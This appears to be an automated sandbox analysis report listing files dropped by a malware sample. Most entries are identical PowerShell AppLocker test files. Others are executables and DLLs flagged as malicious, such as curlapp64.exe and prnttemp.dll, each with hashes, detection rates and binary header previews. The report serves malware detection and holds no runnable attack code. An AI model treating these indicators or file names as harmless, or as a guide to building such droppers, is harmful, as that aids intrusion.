                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5svduum.ynw.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emyqpfoh.jzy.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ep2klb2q.3dv.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_farnign1.r3n.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqmqqnfq.t1l.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_io110hvn.scg.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_js1oyx3w.vdp.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkjl5fh4.eqi.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfftcaxs.usa.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3m2qyrt.cpz.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0yjs0vp.esc.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbec22xf.lnt.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpmtcqpu.qex.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcitnucg.lrb.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rs25q2yh.t14.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_st3ia1nn.ddi.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tp2iqa1b.by1.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjb2zd3d.xdk.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wy0n235f.hcu.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeqkvpf4.oia.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytwezqvr.3nh.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\Desktop\curlapp64.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\dYUteuvmHn.exe
                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):614912
                                                                                                                              Entropy (8bit):6.604540142668264
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:X4Jol6Uw0xtsF10nnWHO8VVph0lhSMXliatZ/p1Yyt:ouVzE1wnWHDnh0lhSMXlJZ/v
                                                                                                                              MD5:990DCC08D59B375A75DD575701DD2AA4
                                                                                                                              SHA1:637AF1AF09157095D5C0005FE272E46857F861E6
                                                                                                                              SHA-256:13A8862BE683AD1298C8E60692C274B9F62C454A26A11841031D53F2B90BEDCC
                                                                                                                              SHA-512:C4F1DB31DBAD83E470F8D44F8F376AFF4E67B0D0FBF89F448C8406E4AACDF69826391D046889E8FD7D36E8B5DF986B3002CF18469629D5F3C980FBCD822BCF8E
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...^..^..^..H[...^..HZ..^..H]..^.M]..^.MZ..^.M[...^..L_..^..H_..^.._.(.^..LW..^..L...^..L\..^.Rich..^.........................PE..d....-*g.........."....).z...........>.........@..........................................`.....................................................P............P...B...................l..8............................j..@...............X............................text....x.......z.................. ..`.rdata...u.......v...~..............@..@.data....1..........................@....pdata...B...P...D..................@..@.fptable.............R..............@....rsrc................T..............@..@.reloc...............V..............@..B........................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\libcurl.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\dYUteuvmHn.exe
                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):588800
                                                                                                                              Entropy (8bit):6.3852695857936554
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:1dkYvMQmNkYBasGpIFetxo8u3zTkIXmaKSTQP76NuudqbaRArq:1zvMQmmYB4KQ7nu3zuSTQP76NuudqbaF
                                                                                                                              MD5:18CE47F58B4C1A9CFC1EDF7C8BF49B7C
                                                                                                                              SHA1:E74D08AB06ED8200D7E674D8031D6DF8250DE8CB
                                                                                                                              SHA-256:36D97F1C254832CEE9698CEA2F1A63EA98D231641FD29715EF581BE103ACE602
                                                                                                                              SHA-512:19B2D6968095C4E8F08C66AB73E7EC5E0439712BCB2777266602EF2AD123A779395A3D44BC0C7C9945376998FB2165BC60E6BF682863A55A0CFF40C720594BDD
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, Detection: malicious, Browse
                                                                                                                              • Filename: app64.exe, Detection: malicious, Browse
                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............|.X.|.X.|.X...X.|.X...Y.|.X..`X.|.X...Y.|.X...Y.|.X...Y.|.X...Y.|.X.|.Xh|.X...Y.|.X...Y.|.X...Y.|.X..bX.|.X.|.X.|.X...Y.|.XRich.|.X........................PE..d...o..f.........." ...).....`......@........................................0............`..........................................Q..$...4[..T................Z........... ..0... ...T...............................@...............`............................text.............................. ..`.rdata..D...........................@..@.data....1...p...*...d..............@....pdata...Z.......\..................@..@.rsrc...............................@..@.reloc..0.... ......................@..B................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\prnttemp.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):17375232
                                                                                                                              Entropy (8bit):7.999975126323966
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:393216:sVzO4uGT4pZjC0MMi9t/I85d4rN9+EC+NhbuJHCa:slLum4/jMvJbd47DC+vbuga
                                                                                                                              MD5:A2D2E1A778727BB4D04F1186B3E35BFD
                                                                                                                              SHA1:F8C91FDC30DAB61111AA5655E97B3E0E8AE3E372
                                                                                                                              SHA-256:5B9E8C091D03A9E0F078C9B949EB6650315ACA2AE6912A8885F1F4FA656700FE
                                                                                                                              SHA-512:AD69762097EB5A7AFE877AEB020039947964483774A8DEBFC4F987A389D3AECFA50311F05AE97B5C2ECF2C782F58A82B2B4BBCB0A69EA9ACE682D896A3964E3C
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{...{...{.......~...{...j.......z.......z.......z.......z...Rich{...........PE..d....pUg.........." ...*.*.......... $.......................................P............`.........................................PH..L....H..<............@..P...................xD..8............................................@...............................text....(.......*.................. ..`.rdata.......@......................@..@.data...I....P.......:..............@....pdata..P....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\Desktop\zlib1.dll

                                                                                                                              Download File
                                                                                                                              Process:C:\Users\user\Desktop\dYUteuvmHn.exe
                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):90624
                                                                                                                              Entropy (8bit):6.509332615593886
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:Wc9wKxbEwda1CzUbFfbpVxyRyxpGTlKAbe6IOcIOZyyFz5o9X2153:7uKxbEwUEAhbprCOGTKISZyuVo9GT
                                                                                                                              MD5:F53D1EFEA4855DA42DA07DE49D80BA68
                                                                                                                              SHA1:920349F4BD5A5B8E77195C81E261DFA2177EB1EE
                                                                                                                              SHA-256:7E9F43688189578042D791E3E5301165316EDC7C1ED739E0669C033A3CA08037
